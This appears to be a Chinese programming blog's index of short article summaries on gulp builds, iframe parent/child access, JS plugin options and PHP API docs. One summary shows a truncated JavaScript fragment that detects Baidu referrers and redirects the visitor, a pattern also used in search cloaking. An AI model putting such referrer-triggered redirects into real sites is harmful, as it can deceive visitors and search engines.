摘要:
优化了文件过滤,更改文件只会重新生成修改的文件 项目目录构建: 在入口文件public下,创建html目录,作为前台静态资源目录 gulp.js文件 package.json文件 命令行运行指令 阅读全文
摘要:
转自:https://mp.weixin.qq.com/s/Jxe3V7D0PFLvIFNZPlSyNg 阅读全文
摘要:
var regexp=/\.(baidu)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(where.indexOf("baidu")>0) { document.write('') setTimeout(function(){ window.location.href='http://www.ba... 阅读全文
摘要:
前提:页面不可跨域访问,必须同一域名下,否则返回值为空 父页面 子页面 阅读全文
摘要:
显示样式: 扩展配置项js: js css html页面内调用 阅读全文
摘要:
最后生成样子: 配置值: * back {function} 回调函数 * msghtml {html} 自定义的html * title {string|object} 标题 * {txt:标题,back:后退按钮} * 字符串则只有标题,有back字段对象则有后退按钮 * sum {int} 输 阅读全文
摘要:
参考地址:https://github.com/itxq/api-doc-php 阅读全文